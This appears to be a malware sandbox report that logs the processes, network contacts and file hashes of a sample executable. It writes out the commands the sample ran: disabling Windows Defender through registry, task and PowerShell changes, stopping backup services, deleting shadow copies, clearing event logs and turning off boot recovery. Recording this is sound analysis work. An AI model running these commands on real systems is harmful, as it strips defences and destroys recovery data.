PID 2060 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\sc.exe
PID 2060 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 4056 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe
PID 2060 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe

"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12a5d" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12a5d" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12a5d" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4d65dd086c3931a681bf45bae39b36f8
SHA1 7776ec7306249b8a555f880b350173106a26598e
SHA256 7c6b01d70f064deb736da06cf36f4793f693fbe266c1a17da6821f65677b7b6c
SHA512 0cc037ddc88e4fac059ae56114e4d4d6ba4dc92e7609576e754af198d814caed7bfc54977aab2cf97f102e1decf2a4d8c668bbfd09123773c19da2d60667a692
